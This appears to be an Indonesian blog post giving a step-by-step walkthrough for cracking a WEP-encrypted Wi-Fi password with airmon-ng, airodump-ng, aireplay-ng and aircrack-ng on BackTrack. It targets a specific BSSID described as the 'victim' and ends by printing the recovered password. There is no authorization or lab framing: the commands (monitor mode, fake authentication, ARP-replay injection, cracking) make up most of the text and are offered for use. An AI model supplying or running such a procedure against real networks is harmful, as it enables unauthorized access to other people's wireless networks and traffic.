ok langsung ya
buka terminal pada backtrack
lalu hidupkan mode monitornya disini interface saya wlan0
airmon-ng start wlan0setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya
ketikkan perintah
airodump-ng mon0
terus cari wifi yan g terkunci dengan enkripsi WEP
disini saya akan menyerang wifi trojanzboy@wifi
setelah menentukan target langsung saja kita berhentikan scanningnya dengan menekan ctrl + c
dan masukkan perintah
airodump-ng -c 1 -w wep --bssid 94:0c:6d:ee:c2:3f mon0
keterangan
-c = channel korban bisa di lihat di keterangan pada scanningnya
-w = output hasil scanning disini saya namakan wep
--bssid = mac address wifi korban
mon0 = mode monitor nya
setelah itu kita melihat data yang bertebaran pada wifi korban beserta beaconya
setelah itu tekan shift + t untuk membuka tab baru pada terminal
dan masukkan perintah
aireplay-ng -1 0 -a 94:0c:6d:ee:c2:3f mon0
ket
-a = bssid korban
setelah itu kita melihat sukses atau tidak pada mode deauth tadi
jika success association succesful berarti kita sukses dan kita lanjut pada mode penyerangan selanjutnya
ketikkan perintah
aireplay-ng -3 -b 94:0c:6d:ee:c2:3f mon0
dan tunggu sampai kita mendapatkan data pada mode monitor tadi
ingat data yang diperlukan sampai 30000 lebih ya
wow ternyata data sudah sampai 30000 sekarang saatnya proses pengcrackan data tersebut
ketikkan perintah
aircrack-ng wep-01.cap
ket = jangan lupa nama capture tadi ya pada scanning dengan airodump
DAN PASSWORDNYA AKHIRNYA DITEMUKAN 0321861433
0 comments:
Post a Comment